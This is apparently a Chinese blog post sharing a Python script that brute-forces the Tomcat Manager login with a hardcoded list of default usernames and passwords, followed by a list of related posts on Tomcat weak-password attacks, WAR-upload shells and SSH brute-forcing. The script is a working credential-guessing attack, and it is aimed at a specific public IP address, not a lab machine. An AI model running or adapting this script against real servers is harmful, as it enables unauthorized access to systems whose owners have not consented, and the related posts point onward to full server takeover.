tomcat 弱口令爆破脚本

已于 2023-06-26 15:17:30 修改
阅读量1k 收藏 1
点赞数 1
分类专栏: 优秀文章 秀秀 文章标签: tomcat java
于 2023-03-19 22:31:00 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_52549196/article/details/129657947
版权
本文详细介绍了如何编写和使用Tomcat弱口令爆破脚本,通过自动化手段检查Tomcat服务器的安全性,防止未授权访问。内容包括脚本原理、实现步骤及实战应用,旨在提升Java应用服务器的安全防护能力。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

import base64
from time import sleep
import requests


import ssl



username=['admin', 'root', 'tomcat','role1','QCC','xampp','ADMIN','cxsdk','j2deployer','ovwebusr']
password=['admin', 'tomcat','root', '123456', 'admin123','j5Brn9','changethis','role1','None','QLogic66','s3cret','ADMIN','kdsxc','j2deployer','OvW*busr1']

password_base64 = []

for i in username:
    for j in password:
        password_base64.append(base64.b64encode((i+":"+j).encode("utf8")).decode("utf8"))
        

def cheek_tomcat(url):
    i = 0
    print(f"[+] startig tomcat cheek ---{url}---")
    con = int(len(password_base64))
    for basic in password_base64:
        i = i + 1
        print("[+] 正在进行第 {} 组密码暴破## ".format(i),end="\r")
        headers = {
        "Accept":"application/x-shockwave-flash, image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*",
        "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50", 
        "Content-Type":"application/x-www-form-urlencoded",
        'Authorization': 'Basic %s' % basic
        }
        # sleep(1)
        try:
            req = requests.get(url, headers=headers, timeout=5,verify=False)
            if req.status_code == 200:
                print("[+] status_code:",req.status_code, "tomcat爆破成功:",base64.b64decode(basic.encode("utf-8")).decode("utf-8"))
            else:
                pass
        except Exception as e:
            print(e)

target='''
118.114.244.201:28181
'''

for i in target.strip().split("\n"):
    if(i[1].isdigit()):
        cheek_tomcat("http://"+i+"/manager/html")
    else:
        cheek_tomcat(i+"/manager/html")

在这里插入图片描述

Tomcat漏洞——弱口令爆破
weixin_57379923的博客
08-07 673
靶机:CentOS7 IP:192.168.100.40。攻击机:kali IP:192.168.100.60。版 权 声 明:本博客所有文章除特别声明外,均采用。文章版权归作者所有,未经允许请勿转载!作 者:PeiyuJue。
漏洞复现 - - -Tomcat弱口令漏洞
weixin_67503304的博客
08-07 7872
通过弱口令的方法爆破tomcat漏洞,通过上传war包拿到shell,简单的弱口令漏洞复现。
tomcat 弱口令爆破
2301_77315080的博客
09-26 452
设置 Payload 1 的值为。设置 Payload 2 的值为。Payload 选择。登录tomcat网站。
Metasploit爆破Tomcat弱口令
→_→
08-17 1442
声明:以下内容均来自“实验吧”免费公益渗透平台,该平台至今仍旧在维护,估计~~,为此把以前保留的笔记拿来分享下。 [实验目的] 1) 利用 Tomcat弱口令漏洞,破解出登陆密码,获得目标主机会话。 [实验原理] 1) 利用枚举的方法破解Tomcat弱口令。 [实验环境] [实验步骤] 一、利用nmap工具扫描目标主机 1.1 在终端中输入命令“nmap –sV 192.168.1.3”,对目标主机进行端口扫描,发现开放8081端口并且运行着ApacheTomcat/C...
Tomcat 弱口令爆破登陆 War包上传 Getshell
小晓晓晓林的博客
01-28 1309
影响版本 Tomcat全版本 环境搭建 前两篇文章有提到,这里不再赘述 尝试复现 利用burpsuite进行爆破Manager登陆页 http://10.130.3.245:8080/manager/html
tomcat弱口令爆破怎么使用自己的字典
最新发布
04-27
### Tomcat弱口令爆破使用自定义字典教程 #### 准备工作 在进行Tomcat弱口令爆破之前,需要准备一些必要的工具和环境配置。以下是具体的操作说明: 1. **安装并启动Metasploit框架** Metasploit是一个功能强大的...
tomcat后台密码爆破脚本(python+字典)_Web中间件漏洞之Tomcat
weixin_39806288的博客
11-21 1104
1Tomcat简介Tomcat 服务器是一个免费的开放源代码的 Web 应用服务器,属于轻量级应用服务器,在中小型系统和并发访问用户不是很多的场合下被普遍使用,是开发和调试 JSP 程序的首选。对于一个初学者来说,可以这样认为,当在一台机器上配置好 Apache 服务器,可利用它响应 HTML(标准通用标记语言下的一个应用)页面的访问请求。实际上 Tomcat 是 Apache 服务器的扩展,但运...
Tomcat 弱口令及文件上传漏洞复现
君莫hacker的博客
09-16 3570
目录0x01 漏洞介绍0x02 环境部署:0x03 漏洞复现 0x01 漏洞介绍 漏洞描述 漏洞编号 受影响版本 0x02 环境部署: 搭建一次,复现百次 靶机 ip:192.168.30.209 kali ip:192.168.30.182 0x03 漏洞复现 从github下载tomcat8的源码,我们可以查看到tomcat的默认登录名为tomcat,并且密码也为tomcat 点击Server Status进行登录 弱口令tomcat tomcat 直接登录成功 发现文件上传点
使用Metasploit爆破Tomcat密码
m0_71230077的博客
05-30 311
Apache tomcat是世界上使用最广泛的java web应用服务器之一,绝大多数人都会使用tomcat的默认配置。默认配置中会有一个向外网开放的web应用管理器,管理员可以利用它在服务器中启动、停止、添加和删除应用。Tomcat是应用(Java)服务器,可以认为是Apache的扩展,但它可以独立于Apache运行,支持JSP和Servlet。Apache可以单向连接Tomcat,访问Tomcat资源,反之则不行,但它们可在一台服务器上进行集成。
Tomcat弱口令爆破+war部署getshell
baiduxuexin的专栏
01-18 294
Tomcat弱口令爆破+war部署getshell 弱口令爆破--使用burpsuite爆破 提交用户名和密码后抓包 不用解码 caidao:
zimbra邮箱在线口令爆破脚本
02-23
利用python编写的脚本,用于zimbra邮箱服务器的用户口令在线爆破
Tomcat弱口令扫描工具
07-18
Tomcat弱口令扫描工具,可自己写字典进行爆破
Tomcat弱口令扫描器
05-08
弱口令扫描的工具有很多中,而在这其中,比较优秀的一款就是Tomcat,用起来很方便。希望上传给大家共享,也为了以后自己方便查找。
tomcat 弱口令tomcat8】
向安全进发的博客
04-20 1299
Tomcat支持后台部署War文件,默认情况下管理页面仅允许本地访问。 攻击条件:如果网站运维/开发人员手动修改配置文件中的信息允许远程IP进行访问(需求),且恶意攻击者拿到管理界面账户密码情况下,则可上传木马文件,控制系统。==
Tomcat弱口令爆破&war包上传
weixin_51151498的博客
12-06 1579
tomcat弱口令
ssh弱口令爆破脚本
Bu2n的博客
12-19 3100
@ toc import paramiko import argparse import socket import time import sys """ paramiko模块 需要pip install安装 测试环境:python版本3.10 使用方法:python xx.py进行查看帮助手册 """ description = "例如 python ssh弱口令爆破.py 192.168.175.134 -u burnchi -p e:/pass_lis.txt" # 进行ssh连接动作 de
密码爆破脚本
weixin_34009794的博客
04-26 478
昨天遇到一个基于onethink开发的程序。源码是脱下来了。但是密码始终破解不了。来看看加密函数 function think_ucenter_md5($str, $key = 'ThinkUCenter'){ return '' === $str ? '' : md5(sha1($str) . $key); } if(is_array($user) && $us...
Tomcat弱口令及war包漏洞复现(保姆级教程)
m0_69043895的博客
04-21 3300
这里我们采用针对同一弱口令爆破不同账号的方式进行猜解,将可能存在的username放入position1的位置,其次放置password在position3的位置,最后attack时爆破的顺序如下图,就不会针对同一账号锁定。优快云上有个脚本利用的是占满tomcat缓存的方式绕过,当同一账号大于5次登录,就会采用脏数据去进行登录,直到缓存占满后,又会用剩下的可能存在的username进行登录。链接的地址是 /zip文件的前缀/文件名,比如我这里就是http://IP/shell/shell.jsp。
2024版最新148款CTF工具整理大全(附下载安装包)含基础环境、Web 安全、加密解密、密码爆破、文件、隐写、逆向、PWN等全套工具
热门推荐
Libra1313的博客
10-23 1万+
经常会有大学生粉丝朋友私信大白,想通过打CTF比赛镀金,作为进入一线互联网大厂的门票。但是在CTF做题很多的时候都会用到工具,所以在全网苦寻CTF比赛工具安装包!
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

????27282

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值